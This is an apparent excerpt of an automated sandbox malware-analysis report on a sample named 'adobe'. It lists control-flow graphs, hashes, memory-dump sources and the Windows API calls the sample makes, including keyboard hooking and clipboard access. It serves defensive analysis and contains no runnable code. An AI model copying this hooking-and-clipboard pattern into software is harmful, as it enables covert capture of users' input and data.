535->562 563 689d2c7-689d2cd 535->563 546 689d16a-689d176 537->546 547 689d15d-689d162 537->547 702 689d6b9-689d6bf 538->702 703 689d8da-689d8e4 538->703 541->537 545 689d193-689d196 541->545 542->541 558 689d198-689d19a 545->558 559 689d1a5-689d1a8 545->559 556 689d17c-689d18e 546->556 557 689d8e5-689d91e 546->557 547->546 556->545 584 689d920-689d923 557->584 558->534 567 689d1a0 558->567 560 689d1aa-689d1ec 559->560 561 689d1f1-689d1f4 559->561 560->561 572 689d211-689d214 561->572 573 689d1f6-689d20c 561->573 578 689d2f5-689d301 562->578 568 689d2cf 563->568 569 689d2d1-689d2dd 563->569 567->559 580 689d2df-689d2e7 568->580 569->580 582 689d25d-689d25f 572->582 583 689d216-689d225 572->583 573->572 603 689d30f 578->603 604 689d303-689d30d 578->604 580->578 594 689d261 582->594 595 689d266-689d269 582->595 590 689d234-689d240 583->590 591 689d227-689d22c 583->591 596 689d925-689d941 584->596 597 689d946-689d949 584->597 590->557 605 689d246-689d258 590->605 591->590 594->595 595->491 595->506 596->597 599 689d94b-689d977 597->599 600 689d97c-689d97f 597->600 599->600 606 689d98e-689d990 600->606 607 689d981 call 689da3d 600->607 608 689d314-689d316 603->608 604->608 605->582 614 689d992 606->614 615 689d997-689d99a 606->615 618 689d987-689d989 607->618 608->534 616 689d31c-689d338 call 6896510 608->616 614->615 615->584 619 689d99c-689d9ab 615->619 631 689d33a-689d33f 616->631 632 689d347-689d353 616->632 618->606 628 689d9ad-689da10 call 6896510 619->628 629 689da12-689da27 619->629 628->629 631->632 632->516 636 689d355-689d3a2 632->636 636->534 704 689d6ce-689d6d7 702->704 705 689d6c1-689d6c6 702->705 704->557 706 689d6dd-689d6f0 704->706 705->704 708 689d8ca-689d8d4 706->708 709 689d6f6-689d6fc 706->709 708->702 708->703 710 689d70b-689d714 709->710 711 689d6fe-689d703 709->711 710->557 712 689d71a-689d73b 710->712 711->710 715 689d74a-689d753 712->715 716 689d73d-689d742 712->716 715->557 717 689d759-689d776 715->717 716->715 717->708 720 689d77c-689d782 717->720 720->557 721 689d788-689d7a1 720->721 723 689d8bd-689d8c4 721->723 724 689d7a7-689d7ce 721->724 723->708 723->720 724->557 727 689d7d4-689d7de 724->727 727->557 728 689d7e4-689d7fb 727->728 730 689d80a-689d825 728->730 731 689d7fd-689d808 728->731 730->723 736 689d82b-689d844 call 6896510 730->736 731->730 740 689d853-689d85c 736->740 741 689d846-689d84b 736->741 740->557 742 689d862-689d8b6 740->742 741->740 742->723
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: $^q$$^q$$^q
                        • API String ID: 0-831282457
                        • Opcode ID: db38b267a26316bfef29ba24f5004df9caea5bd065e66c278c379c7874788956
                        • Instruction ID: d218def47866d5b68f81885f0effb1522300011a60559cc6e2b6f1485d9c7468
                        • Opcode Fuzzy Hash: db38b267a26316bfef29ba24f5004df9caea5bd065e66c278c379c7874788956
                        • Instruction Fuzzy Hash: 24626E34A0061A8FCF15EB69D580A5EB7B2FF84304B248A28D009DF359DB75ED4ACB95

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 750 6894b18-6894b3c 752 6894b3e-6894b41 750->752 753 6895220-6895223 752->753 754 6894b47-6894c3f 752->754 755 6895225-689523f 753->755 756 6895244-6895246 753->756 774 6894cc2-6894cc9 754->774 775 6894c45-6894c92 call 68953c0 754->775 755->756 758 6895248 756->758 759 689524d-6895250 756->759 758->759 759->752 761 6895256-6895263 759->761 776 6894d4d-6894d56 774->776 777 6894ccf-6894d3f 774->777 788 6894c98-6894cb4 775->788 776->761 794 6894d4a 777->794 795 6894d41 777->795 792 6894cbf-6894cc0 788->792 793 6894cb6 788->793 792->774 793->792 794->776 795->794
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: fcq$XPcq$\Ocq
                        • API String ID: 0-3575482020
                        • Opcode ID: e127055d3049608758b61c9a30cf553941b968bd4d467ee8809aeceb1c0bfc13
                        • Instruction ID: 3daad62d7803315cac37efb35be3a90271647867c09a126d3655602526714d71
                        • Opcode Fuzzy Hash: e127055d3049608758b61c9a30cf553941b968bd4d467ee8809aeceb1c0bfc13
                        • Instruction Fuzzy Hash: 6B619F30F002199FEF549FA5C855BAEBAF2FF88300F248529E105EB395DB758D458B91

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1040 689a318-689a319 1041 689a31b-689a348 1040->1041 1042 689a29c-689a2a9 1040->1042 1043 689a34a-689a34d 1041->1043 1044 689a2b0 1042->1044 1045 689a34f-689a36b 1043->1045 1046 689a370-689a373 1043->1046 1047 689a2b5-689a2b8 1044->1047 1045->1046 1050 689a379-689a412 call 6892058 1046->1050 1051 689a41f-689a422 1046->1051 1048 689a2da-689a2dd 1047->1048 1049 689a2ba-689a2d5 1047->1049 1055 689a2ff-689a301 1048->1055 1056 689a2df 1048->1056 1049->1048 1053 689a428-689a455 call 6892058 1050->1053 1098 689a414-689a41e 1050->1098 1051->1053 1054 689a553-689a556 1051->1054 1091 689a548-689a552 1053->1091 1092 689a45b-689a480 1053->1092 1059 689a558-689a562 1054->1059 1060 689a563-689a566 1054->1060 1057 689a308-689a30b 1055->1057 1058 689a303 1055->1058 1069 689a2eb-689a2fa 1056->1069 1063 689a30d-689a311 1057->1063 1064 689a290-689a293 1057->1064 1058->1057 1066 689a568-689a576 1060->1066 1067 689a581-689a584 1060->1067 1064->1047 1070 689a295-689a2a9 1064->1070 1066->1050 1083 689a57c 1066->1083 1073 689a5a4-689a5a6 1067->1073 1074 689a586-689a59f 1067->1074 1069->1055 1070->1044 1076 689a5a8 1073->1076 1077 689a5ad-689a5b0 1073->1077 1074->1073 1076->1077 1077->1043 1082 689a5b6-689a5bf 1077->1082 1083->1067 1099 689a48a 1092->1099 1100 689a482-689a488 1092->1100 1101 689a490-689a542 call 6896510 call 6892058 1099->1101 1100->1101 1101->1091 1101->1092
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: X!@$x!@
                        • API String ID: 0-2527372166
                        • Opcode ID: b9fac1dd339139f9489085dc11c5963aa5b4b48e2e12bd0ec7f6718124e10aeb
                        • Instruction ID: 579246dbcaa6b80f8326699f26e8cd8cacbbdc46dcc0577e97698e2203fbdcfc
                        • Opcode Fuzzy Hash: b9fac1dd339139f9489085dc11c5963aa5b4b48e2e12bd0ec7f6718124e10aeb
                        • Instruction Fuzzy Hash: F581A131F001199FDF94DBA9E8906ADB7B2FB88314F148929E50AE7354DB31ED468B90

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1215 68990bb-68990ed 1216 68990ef-68990f2 1215->1216 1217 68990f8-689910d 1216->1217 1218 68999b0-68999b3 1216->1218 1224 689910f-6899115 1217->1224 1225 6899125-689913b 1217->1225 1219 68999d9-68999db 1218->1219 1220 68999b5-68999d4 1218->1220 1222 68999dd 1219->1222 1223 68999e2-68999e5 1219->1223 1220->1219 1222->1223 1223->1216 1226 68999eb-68999f5 1223->1226 1228 6899119-689911b 1224->1228 1229 6899117 1224->1229 1232 6899146-6899148 1225->1232 1228->1225 1229->1225 1233 689914a-6899150 1232->1233 1234 6899160-68991d1 1232->1234 1235 6899152 1233->1235 1236 6899154-6899156 1233->1236 1245 68991fd-6899219 1234->1245 1246 68991d3-68991f6 1234->1246 1235->1234 1236->1234 1251 689921b-689923e 1245->1251 1252 6899245-6899260 1245->1252 1246->1245 1251->1252 1257 689928b-68992a6 1252->1257 1258 6899262-6899284 1252->1258 1263 68992a8-68992c4 1257->1263 1264 68992cb-68992d9 1257->1264 1258->1257 1263->1264 1265 68992e9-6899363 1264->1265 1266 68992db-68992e4 1264->1266 1272 68993b0-68993c5 1265->1272 1273 6899365-6899383 1265->1273 1266->1226 1272->1218 1277 689939f-68993ae 1273->1277 1278 6899385-6899394 1273->1278 1277->1272 1277->1273 1278->1277
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: $^q$$^q
                        • API String ID: 0-355816377
                        • Opcode ID: 2fe193979fcfd4382f14e0989c84ad2f8e7f122f3542bd39baf37238596889fe
                        • Instruction ID: 020023c5fe51d680a9e5b223eab7ff7d9763624258350a3b460e5bddcf25ad38
                        • Opcode Fuzzy Hash: 2fe193979fcfd4382f14e0989c84ad2f8e7f122f3542bd39baf37238596889fe
                        • Instruction Fuzzy Hash: BB516230B006169FDF54DB75D990BAE73F6EBC9244F148529D509DB388EA70EC42CB91

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1356 6882e0d-6882e1a 1358 6882e1c-6882e21 1356->1358 1359 6882e23-6882e25 1358->1359 1360 6882e27-6882e29 1358->1360 1359->1360 1361 6882e2b-6882e2d 1360->1361 1362 6882e2f-6882e31 1360->1362 1361->1362 1363 6882e33-6882e35 1362->1363 1364 6882e37-6882e39 call 68816e4 1362->1364 1363->1364 1383 6882e3a call 6882e58 1364->1383 1384 6882e3a call 6882e0d 1364->1384 1367 6882e3d-6882e50 1367->1358 1368 6882e52-6882ebe 1367->1368 1370 6882ec9-6882ed0 1368->1370 1371 6882ec0-6882ec6 1368->1371 1372 6882edb-6882f7a CreateWindowExW 1370->1372 1373 6882ed2-6882ed8 1370->1373 1371->1370 1375 6882f7c-6882f82 1372->1375 1376 6882f83-6882fbb 1372->1376 1373->1372 1375->1376 1380 6882fc8 1376->1380 1381 6882fbd-6882fc0 1376->1381 1382 6882fc9 1380->1382 1381->1380 1382->1382 1383->1367 1384->1367
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886385559.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6880000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 191c788767cd63f4357009a60a131ed115507d1abceb489cad9d1da6b75f2653
                        • Instruction ID: aef357f9f6700ec0e29ae48b343bebab2fedd776146fa334ca2c2fd6f29f08f4
                        • Opcode Fuzzy Hash: 191c788767cd63f4357009a60a131ed115507d1abceb489cad9d1da6b75f2653
                        • Instruction Fuzzy Hash: C151F1B1C00209AFDF11DFA9D884ADEBFB1FF48310F14812AE818AB261D7719951CF95
                        Memory Dump Source
                        • Source File: 00000004.00000002.1873358702.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_1060000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9873966f0d41d5edff851da1dd617de04756b07b8c4c9dff56962d60cb2faa8a
                        • Instruction ID: 7538df6e8d655a23597641817b3cb0a78a27d53628b6f2404726272c3e5bfa78
                        • Opcode Fuzzy Hash: 9873966f0d41d5edff851da1dd617de04756b07b8c4c9dff56962d60cb2faa8a
                        • Instruction Fuzzy Hash: 0B412371D043868FCB14DF79C80429EBFF4AF8A310F1486AAD448A7292DB749844CBD1
                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06882F6A
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886385559.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6880000_adobe.jbxd
                        Similarity
                        • API ID: CreateWindow
                        • String ID:
                        • API String ID: 716092398-0
                        • Opcode ID: dcc55a249d65a3022ba696f84a1ce522b81c807d5c4d8e697d62d9e738411cb3
                        • Instruction ID: 6f646909b60105aa6d8d3c65bb2627733a0bce62c22392ecdcad70abf9e5c6ec
                        • Opcode Fuzzy Hash: dcc55a249d65a3022ba696f84a1ce522b81c807d5c4d8e697d62d9e738411cb3
                        • Instruction Fuzzy Hash: B441CFB1D00309DFDB14DFAAC884ADEBBB5FF48310F24852AE819AB211D7749985CF94
                        APIs
                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 068879E9
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886385559.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6880000_adobe.jbxd
                        Similarity
                        • API ID: CallProcWindow
                        • String ID:
                        • API String ID: 2714655100-0
                        • Opcode ID: f3d6aa3ee416c8a17f80d0c1628d139bd5902af012bdb2e3fd7210d839583f45
                        • Instruction ID: f1b5f87cf299e6c37d1177304863c17d4b7b4e8af710395838ce0a57f9600971
                        • Opcode Fuzzy Hash: f3d6aa3ee416c8a17f80d0c1628d139bd5902af012bdb2e3fd7210d839583f45
                        • Instruction Fuzzy Hash: 274126B5900309CFDB54DF99C888AAEBBF5FF88314F248459D519AB321D774A941CFA0
                        APIs
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886385559.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6880000_adobe.jbxd
                        Similarity
                        • API ID: Clipboard
                        • String ID:
                        • API String ID: 220874293-0
                        • Opcode ID: 8f99255b80b4921be328371b1f2f78b57b048fca895e953014c4eaa5f709cf53
                        • Instruction ID: c2a1e61768bd052fcba4d7864623511cadf4f3c3ab1c35f060124151d42b3ce7
                        • Opcode Fuzzy Hash: 8f99255b80b4921be328371b1f2f78b57b048fca895e953014c4eaa5f709cf53
                        • Instruction Fuzzy Hash: 283102B4E01249DFDB10EFA9C984BCDBBF5AF48304F248069E408AB394DBB45945CF95
                        APIs
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886385559.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6880000_adobe.jbxd
                        Similarity
                        • API ID: Clipboard
                        • String ID:
                        • API String ID: 220874293-0
                        • Opcode ID: 96321b0395214753a57f92d82fe6345ea763e209fced008092eb0837b36ebd92
                        • Instruction ID: b972e5ab3ef98108a0b43e15cba10a81c397f9ee423fef99d0f00249b6c4f8dc
                        • Opcode Fuzzy Hash: 96321b0395214753a57f92d82fe6345ea763e209fced008092eb0837b36ebd92
                        • Instruction Fuzzy Hash: AE3120B0E01208DFDB10EFA9C984BDEBBF4AF48304F608019E508BB290D7B4A945CF95
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06886B1F
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886385559.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6880000_adobe.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: ad1a0c2cd53ffeabaca9f31324faa9f579158ee42bec16c43e4bc28519a04379
                        • Instruction ID: 914eca1f7ce1b3e4bc9a539abbff50ced40825b55791503c8529cb27573c2840
                        • Opcode Fuzzy Hash: ad1a0c2cd53ffeabaca9f31324faa9f579158ee42bec16c43e4bc28519a04379
                        • Instruction Fuzzy Hash: A321E6B5900249AFDB10CFAAD984ADEBFF8FB48310F14841AE958A3311D374A944CFA5
                        APIs
                        • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0688A343
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886385559.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6880000_adobe.jbxd
                        Similarity
                        • API ID: HookWindows
                        • String ID:
                        • API String ID: 2559412058-0
                        • Opcode ID: 03a050b61fec1f8495a1a28a98cc3d3518ec5c1c56b74df9d74ca3bcacbd8621
                        • Instruction ID: fa4c16789711b2dabc3ea7544b2d41400bb0eb3a619fd48f6cf7a175d467d8b2
                        • Opcode Fuzzy Hash: 03a050b61fec1f8495a1a28a98cc3d3518ec5c1c56b74df9d74ca3bcacbd8621
                        • Instruction Fuzzy Hash: FB2135B1D04209DFCB14DF9AC844BEEFBF5AB88320F14842AE459A7290C775A944CFA5
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06886B1F
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886385559.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6880000_adobe.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: 8abdc26a298c8c2374065410ac63784c9dc38ae3b7257a914a2b5e131bc49661
                        • Instruction ID: 7bddf376e589aa4dadb941f7087a2e22b384f6a2d95338b8b1d08936ebea1572
                        • Opcode Fuzzy Hash: 8abdc26a298c8c2374065410ac63784c9dc38ae3b7257a914a2b5e131bc49661
                        • Instruction Fuzzy Hash: 3E21E2B59002099FDB10CFAAD984ADEBFF8FB48320F14841AE918A3311D374A944CFA4
                        APIs
                        • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0688A343
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886385559.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6880000_adobe.jbxd
                        Similarity
                        • API ID: HookWindows
                        • String ID:
                        • API String ID: 2559412058-0
                        • Opcode ID: 217ca11626ddb6c1240ca9226dc1c3bd70386122b52310b09694771c1f80d2f7
                        • Instruction ID: 284c894896b7016b03de7887cc18dad5204462a298815781c4d0eb1d69ec85f7
                        • Opcode Fuzzy Hash: 217ca11626ddb6c1240ca9226dc1c3bd70386122b52310b09694771c1f80d2f7
                        • Instruction Fuzzy Hash: F12124B1D002098FCB54DF9AC844BEEFBF5FB88320F14842AE458A7290C775A944CFA5
                        APIs
                        • GlobalMemoryStatusEx.KERNELBASE ref: 0106EE7F
                        Memory Dump Source
                        • Source File: 00000004.00000002.1873358702.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_1060000_adobe.jbxd
                        Similarity
                        • API ID: GlobalMemoryStatus
                        • String ID:
                        • API String ID: 1890195054-0
                        • Opcode ID: 11615c8800acef10f222178b3f04806196f0d6db21fad05231653f48ef106728
                        • Instruction ID: 464dd64e1fd1477c66e80e9c87a8faf7b7bfb55001da758f85fa349d9d6b6b9a
                        • Opcode Fuzzy Hash: 11615c8800acef10f222178b3f04806196f0d6db21fad05231653f48ef106728
                        • Instruction Fuzzy Hash: 1511E2B1C006599BCB10DF9AC544BDEFBF4AF48320F15816AD858A7251D378A944CFA5
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 06881E16
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886385559.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6880000_adobe.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 704a709143cd784bf676f9ef61ac0fbb294ce8de12ff8a70623304ef22729060
                        • Instruction ID: 27f8b066d582f959f99387bdb630622428a10bfaf52cf9d78e930c52c61184b9
                        • Opcode Fuzzy Hash: 704a709143cd784bf676f9ef61ac0fbb294ce8de12ff8a70623304ef22729060
                        • Instruction Fuzzy Hash: 9411F0B6D002498FCB10DF9AC448BDEFBF4EF48214F10842AD969B7611C775A545CFA5
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 06881E16
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886385559.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6880000_adobe.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: f50d560af4bd814dfbdec28cfeb4106d8d662abe32bb8a8914802fe66ccbfaf7
                        • Instruction ID: 06fc4a19ad2db6a90d13c728d079c4fd4b4c1d8667b4c03f19c8a120dcc3d89b
                        • Opcode Fuzzy Hash: f50d560af4bd814dfbdec28cfeb4106d8d662abe32bb8a8914802fe66ccbfaf7
                        • Instruction Fuzzy Hash: A31102B6C002498FCB14DF9AD848ADEFBF4EF48210F10842AD569B7610C775A545CFA5
                        APIs
                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06887C35), ref: 06887CBF
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886385559.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6880000_adobe.jbxd
                        Similarity
                        • API ID: CallbackDispatcherUser
                        • String ID:
                        • API String ID: 2492992576-0
                        • Opcode ID: 10e12ae883c0459252f624560bd0dcd6c50a6a64d78419701a144552f521201f
                        • Instruction ID: 07e31dce9c28bb5f0e433a611c1c151c46e0dee60e27237c0a2461ef3b387324
                        • Opcode Fuzzy Hash: 10e12ae883c0459252f624560bd0dcd6c50a6a64d78419701a144552f521201f
                        • Instruction Fuzzy Hash: 091133B1800248CFCB60DF9AD488BDEBBF4EB48324F20842AD559A7341C374A944CFA8
                        APIs
                        • OleInitialize.OLE32(00000000), ref: 06888585
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886385559.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6880000_adobe.jbxd
                        Similarity
                        • API ID: Initialize
                        • String ID:
                        • API String ID: 2538663250-0
                        • Opcode ID: 33a32a187b8b858b0fe146715bc0e87bcd8dd25362c23dddf146c6bd24b04d87
                        • Instruction ID: 9daa1d2685b4ca762611eaf43e729dab6c65f854c5ce31170663d931532bce29
                        • Opcode Fuzzy Hash: 33a32a187b8b858b0fe146715bc0e87bcd8dd25362c23dddf146c6bd24b04d87
                        • Instruction Fuzzy Hash: EE1112B1900359CFDB20DF9AD848BDEBBF4EB48324F20845AE519A7611D378A944CFA5
                        APIs
                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06887C35), ref: 06887CBF
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886385559.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6880000_adobe.jbxd
                        Similarity
                        • API ID: CallbackDispatcherUser
                        • String ID:
                        • API String ID: 2492992576-0
                        • Opcode ID: b715498edd2337c0306c511e1b6438dd09102fa9df3d8937c0bfb71bc675b878
                        • Instruction ID: ef2646171cb9c206afcf03fbd72230dd3cc6ac24f41adebadd821bac121d3f0b
                        • Opcode Fuzzy Hash: b715498edd2337c0306c511e1b6438dd09102fa9df3d8937c0bfb71bc675b878
                        • Instruction Fuzzy Hash: 3211F2B58002498FCB20DF9AD848BDEBFF4EB88324F20841AD559A7651C774A544CFA5
                        APIs
                        • OleInitialize.OLE32(00000000), ref: 06888585
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886385559.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6880000_adobe.jbxd
                        Similarity
                        • API ID: Initialize
                        • String ID:
                        • API String ID: 2538663250-0
                        • Opcode ID: 17c3ad17d7f1c36fe0f09010d860e923aa3710ea29c3761571121966c41ab6e0
                        • Instruction ID: f2c9094d2203f1ea993929d81cba2b367e58218868af2deaf92e757262f844e5
                        • Opcode Fuzzy Hash: 17c3ad17d7f1c36fe0f09010d860e923aa3710ea29c3761571121966c41ab6e0
                        • Instruction Fuzzy Hash: B51145B58003498FCB20DFAAD448BCEFFF8EB48320F14845AD559A7211C374A584CFA5
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: XPcq
                        • API String ID: 0-714321711
                        • Opcode ID: d5fb009072e9d695ef9452553280e1785433e7807cc2f1c340b8a44df5e9d117
                        • Instruction ID: b8d5e5059dce945bc090c069ec6dc6725b93d5ff606d523617d3d453ccc6be6e
                        • Opcode Fuzzy Hash: d5fb009072e9d695ef9452553280e1785433e7807cc2f1c340b8a44df5e9d117
                        • Instruction Fuzzy Hash: AA417D30F002099FEB459FA5C854B9EBBF7BF88700F208529E105EB395DB748D459B91
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: PH^q
                        • API String ID: 0-2549759414
                        • Opcode ID: 5748b721b7cb9fd407f0acd62be1d8aee0808bcd5502f13c6b39f1abf8d58847
                        • Instruction ID: d7488c622dd6bea5a469847ae9810f7c1dbee642a42594bb08ce7d4b4c9eb88f
                        • Opcode Fuzzy Hash: 5748b721b7cb9fd407f0acd62be1d8aee0808bcd5502f13c6b39f1abf8d58847
                        • Instruction Fuzzy Hash: DD41F130E00B4A8FDF50CFA5C89469EBBB2BF85304F284529E505EB340EB74D986CB91
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: PH^q
                        • API String ID: 0-2549759414
                        • Opcode ID: 22fdadc7f14886669e1ed7daa5e5cc2488b790d07a69f5b41f730721a62bedce
                        • Instruction ID: cdd1868833910406ff94f310e810fb80454765f1e243d10808fcb4751e98c0d9
                        • Opcode Fuzzy Hash: 22fdadc7f14886669e1ed7daa5e5cc2488b790d07a69f5b41f730721a62bedce
                        • Instruction Fuzzy Hash: B1312330B102019FDF499BB0C56876EBBE2AF89204F18852CD406DB391DF35DE46CBA1
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: PH^q
                        • API String ID: 0-2549759414
                        • Opcode ID: 04d461a67e1db724960b2668fafe907f4c46693c41e95ac1b8b249158bfa6c03
                        • Instruction ID: 958c968d4d15ee01f7cbb70f7ddb147d4594bb6189b1fe2905e057f30b4a00e6
                        • Opcode Fuzzy Hash: 04d461a67e1db724960b2668fafe907f4c46693c41e95ac1b8b249158bfa6c03
                        • Instruction Fuzzy Hash: 0F312230B102059FCF58ABB4C96466EBBE3AF89300F148528D106DB395DF35DE46CBA1
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: |
                        • API String ID: 0-2343686810
                        • Opcode ID: 337ec80d07a9df18d5d573cb909d7882be38827a7b2e6f43080d0b67f40361cd
                        • Instruction ID: 33c9019169f08d17e94dbcf7a99d87c444e8bce67b2fc66a96ba7202d8832658
                        • Opcode Fuzzy Hash: 337ec80d07a9df18d5d573cb909d7882be38827a7b2e6f43080d0b67f40361cd
                        • Instruction Fuzzy Hash: 60116D75F002159FDB549F78C815B9E7BF1AF48704F1084AAEA4ADB391EB759900CB81
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: |
                        • API String ID: 0-2343686810
                        • Opcode ID: b1fed89aebc2b9f5e42ba7e0d3d54f3ff4a5e9f93e7722caea24dce389da38b5
